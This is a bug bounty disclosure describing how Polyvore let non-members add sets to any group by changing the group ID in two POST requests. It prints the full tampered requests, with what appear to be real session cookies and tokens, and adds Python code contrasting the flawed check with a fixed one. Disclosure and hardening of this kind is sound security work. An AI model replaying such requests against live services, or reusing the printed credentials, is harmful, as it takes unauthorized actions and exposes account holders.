Yahoo Bug Bounty: Adding a set to a Polyvore group without joining it.

Polyvore is a community-powered social commerce website headquartered in Mountain View, California. The company's virtual mood board function allows community members to add products into a shared product index, and use them to create image collages called "Sets". They can also browse other users' sets for inspiration, share sets with friends and interact with people through comments and likes. Due to the visual nature of the tool, Polyvore is mostly used to build sets in the fields of home decoration, beauty, and fashion. Online retailers, too, can upload their product images to Polyvore and link back to their product pages or use Polyvore to encourage users to showcase their products through such activities as board creation competitions. [SOURCE: Wikipedia]
                                                                 
Description: In Polyvore a user can create sets, share sets in groups, post sets on their blog, and so on. If you don't know what a set is, reread the line above: 'The company's virtual mood board function allows community members to add products into a shared product index, and use them to create image collages called "Sets"'. As mentioned, a user can add sets to a group. To add sets to a group, the user must first join the group: only members of a group can add sets to it. The issue was that users who were not members of a Polyvore group were also able to add sets to it.

Things to be noted: The same issue affected two different parameters (one per endpoint), so it was rewarded twice.

Steps to reproduce:

There are two ways to add a set to a Polyvore group:

OPTION 1: By clicking on "Add Set".
OPTION 2: From the Publish Set option.

I was able to post a set to any group through both of these endpoints.
When someone adds a set to a group using OPTION 1, the request looked like this:

POST /cgi/group.submit HTTP/1.1
Host: www.polyvore.com
Connection: close
Content-Length: 229
Cache-Control: max-age=0
Origin: https://www.polyvore.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.39 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://www.polyvore.com/all_season_group/group.show?id=73536&tab=members
Accept-Language: en-US,en;q=0.8
Cookie: v=2144240055; rxx=1fy8emu01od.tn5plza&v=1; __gads=ID=1aa3d6be54ccc6e7:T=1502914211:S=ALNI_MbER1uBrTk8BQ0m0bu84W9dJY32ZQ; l=sig&3a2c4110e811cce31771124fa08ab10e34a7f6f066ef1997bdf3f15c5c8f96bf&n&asadx&lat&1502914280&lwt&0&id&23768120&t&1502914280; fbm_2358043356=base_domain=.polyvore.com; as={"cid":"226775741","basedon_tid":null}; fbsr_2358043356=Ewm75X53AReNFEErNGah8YGsJ6H2-fXbw6cr3e4-el4.[truncated]; _gat_UA-1750090-4=1; st=bid|2144240055,client_type|desktop,discussions_enabled|1,exp_ga_test1|20c,exp_ga_test2|on,exp_polydeal|on,outmode|HTML,session_referral_source|none,sid|4,vid|14459003952290544628; se=c&1502914194&v&14459003952290544628&s&4&t&1502916696; _ga=GA1.2.8491215.1502914239; _gid=GA1.2.896406160.1502914239

request={"id":"201799","spec_uuid":"PmG1K8OC5xGWfrjVZRqEYg",".xsrf":"MjM3NjgxMjAsMTUwMjkxNjY5Niw4NDhkZTRhNjNjYzUwMDk0YjljOWE5YTBmN2Y1Njk2YjhlM2EzM2RmODNlYThmNDAzNThkZDE3YzY0MWNhZjFk"}&.in=json

In the above request, 201799 is the group ID. Just by changing the group ID value I was able to post sets to every group, even groups I was not a member of.

Bounty: $500

When publishing a set using OPTION 2, the user can select a group to add the set to.
The request looked like this:

POST /cgi/set.publish HTTP/1.1
Host: www.polyvore.com
Connection: close
Content-Length: 1030
Origin: https://www.polyvore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: https://www.polyvore.com/cgi/app
Accept-Language: en-US,en;q=0.8
Cookie: v=2162389121; rxx=126qceffq2t.uh697lp&v=1; __gads=ID=e1de4979d00d20b6:T=1504729111:S=ALNI_MaxNAPNvE5RhwZPMyv5mVftEtPYoA; fbm_2358043356=base_domain=.polyvore.com; l=sig&3d96e8e7e05a76399c9aec4bb5551644fdce0ec5b6593ee2a968bf18a7016272&n&mohammad-asad&lat&1504730529&lwt&0&id&23771525&t&1504730529; fbsr_2358043356=lgllZoJOWPIYlT3z7lc5JBAi3dXaZL35gBTPUSPvcnY.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImNvZGUiOiJBUUF3YzdjRi1VTGNOc1NTTDlUeE0ta3ppS3FKMXFmUS1NQkIxMTZuc2xoVkV6U1JNaU5WY0VpWUxwNnhRaldjcS1qUWdCYXRlVlZHUzdXcGdZc3VUa2FSd05KTlQxYzdqYzR5WDZrMnFpQjFiR0h1QUdVRFc3c2EtSS1OdUVWLU9xRlpvcEdWbTZwYnlaVE9CUjFHcm1mVlg2TFk2d3JCLURvRElwWE5HWk8tcGJuV24xT0pId0RLYVdHcXhGRF8yeW1GSWJQQzVmMmRZaFByU01reThnLXk1dDY3U2tUdmVMdjNxSTF2MlV4eVhtTlExdTRJRDFfUnpxeXZ4RmV5eC01cHFwV1pnRzdTZ096NXhxSklMMjZLd3RQZnBNeDZaNDlaLVE3b1cydjVOU1hSV0ZXOWhQbEp6bG9PS2hzZEhFbW1QTG9QT05XY1BOd0FodzRWOFZ6SiIsImlzc3VlZF9hdCI6MTUwNDczMTQyMiwidXNlcl9pZCI6IjU5OTUwMzEwNzEwNDMwNiJ9; se=c&1504729100&v&11302205241084592593&s&1&t&1504731782; _ga=GA1.2.111378368.1504729106; _gid=GA1.2.925380198.1504729107; _gat_UA-1750090-4=1; e=%7B%22uuid%22%3A%22Si_txUaT5xGBbTHFWc0rKw%22%2C%22list%22%3A%5B%5B%22saveset%22%5D%5D%2C%22_lts%22%3A1504731778220%7D; st=bid%7C2162389121%2Cclient_type%7Cdesktop%2Cexp_ga_test1%7C10a%2Cexp_ga_test2%7Con%2Cexp_polydeal%7Con%2Coutmode%7CHTML%2Csession_referral_source%7Cnone%2Csid%7C1%2Cvid%7C11302205241084592593

.in=json&.out=json&request={"dirty":1,"id":"227841737","did":null,"basedon_tid":null,"title":"test","description":"nais","category":"menswear","tags":[],"groups":["201799"],"items":[{"x":144.297192642788,"y":70,"w":157.40561471442402,"h":200,"z":1,"transform":[1.0000000000000002,0,0,1.0000000000000002],"type":"image","thing_id":"218486216"},{"x":349.7121771217712,"y":77,"w":164.57564575645756,"h":200,"z":2,"transform":[1.0000000000000002,0,0,1.0000000000000002],"type":"image","thing_id":"218760305"}],"quickshare":"on","quickshare_list":"facebook","pin_type":"long_pin",".xsrf":"MjM3NzE1MjUsMTUwNDczMTc4MyxhNzQ3ZDM5YTVhMDA4YzJmZjFjY2NmNjkzY2QyNzdkYWE3M2VkZjcxZWZlZjU3NGI1YTEyMjEwZjE2NmIwMGU0"}

Here, too, 201799 is the group ID. By changing the group ID anyone would have been able to add a set to any group :)

Bounty: $400
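Both endpoints above share one root cause: the server took the group ID (the `id` field of `group.submit`, the `groups` list of `set.publish`) straight from the client and never checked that the requesting user had joined that group. The `.xsrf` token present in both bodies did not help, because it only proves the request came from the user's own session, not that the user may write into that group. The following is an added example (not Polyvore's code, and not part of the original write-up) showing that pattern next to a server-side membership check; the endpoint paths and field names are the ones from the requests above, while the parsing, the membership table and the trimmed request bodies are constructed assumptions.

```python
import json
from urllib.parse import parse_qs

# Constructed server-side state (hypothetical): user id -> ids of the groups that user has joined.
# The user and group ids echo values from the write-up; the membership itself is invented for the demo.
MEMBERSHIPS = {
    "23768120": {"73536"},
}

# Constructed form body in the shape of the OPTION 1 request (trimmed; .xsrf is a placeholder).
SUBMIT_BODY = ('request={"id":"201799","spec_uuid":"PmG1K8OC5xGWfrjVZRqEYg",'
               '".xsrf":"XSRF_PLACEHOLDER"}&.in=json')


def publish_body(groups):
    """Build a set.publish form body like the OPTION 2 request (constructed, trimmed)."""
    payload = {"dirty": 1, "id": "227841737", "title": "test", "groups": groups,
               "items": [], ".xsrf": "XSRF_PLACEHOLDER"}
    return ".in=json&.out=json&request=" + json.dumps(payload, separators=(",", ":"))


def groups_requested(path, body):
    """Return the group ids a request asks to publish into.

    /cgi/group.submit carries a single group in "id"; /cgi/set.publish carries a list in
    "groups". Endpoint paths and field names are those in the write-up; how the real
    backend parsed them is an assumption.
    """
    form = parse_qs(body)
    payload = json.loads(form["request"][0])
    if path == "/cgi/group.submit":
        return [str(payload["id"])]
    if path == "/cgi/set.publish":
        return [str(g) for g in payload.get("groups", [])]
    raise ValueError("unknown endpoint: " + path)


def vulnerable_add_set(user_id, path, body):
    """The pattern behind the bug: the client-supplied group id is used as-is.

    The .xsrf token only proves the request came from user_id's own session; it says
    nothing about whether user_id may write into that group, so any logged-in user can
    target any group id.
    """
    return {"status": 200, "added_to": groups_requested(path, body)}


def hardened_add_set(user_id, path, body):
    """Authorization derived from server-side membership state, never from the request."""
    member_of = MEMBERSHIPS.get(user_id, set())
    targets = groups_requested(path, body)
    denied = sorted(g for g in targets if g not in member_of)
    if denied:
        # Reject the whole request rather than silently dropping the foreign groups; a
        # "publish into a group I never joined" attempt is worth logging as an IDOR probe.
        return {"status": 403, "denied": denied}
    return {"status": 200, "added_to": targets}


if __name__ == "__main__":
    me = "23768120"
    print(vulnerable_add_set(me, "/cgi/group.submit", SUBMIT_BODY))   # lands in group 201799
    print(hardened_add_set(me, "/cgi/group.submit", SUBMIT_BODY))     # 403, denied ['201799']
    print(hardened_add_set(me, "/cgi/set.publish", publish_body(["73536"])))           # 200
    print(hardened_add_set(me, "/cgi/set.publish", publish_body(["73536", "201799"]))) # 403
```

The check has to run on every endpoint that accepts a group ID, which is exactly why the same bug was paid twice here: fixing `group.submit` alone would have left `set.publish` open. Keeping the membership lookup in one function that every write path calls is the simplest way to avoid that.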

Video POC:

It has been a pleasure to work with YAHOO!. They're very fast and responsive :) Thanks YAHOO!
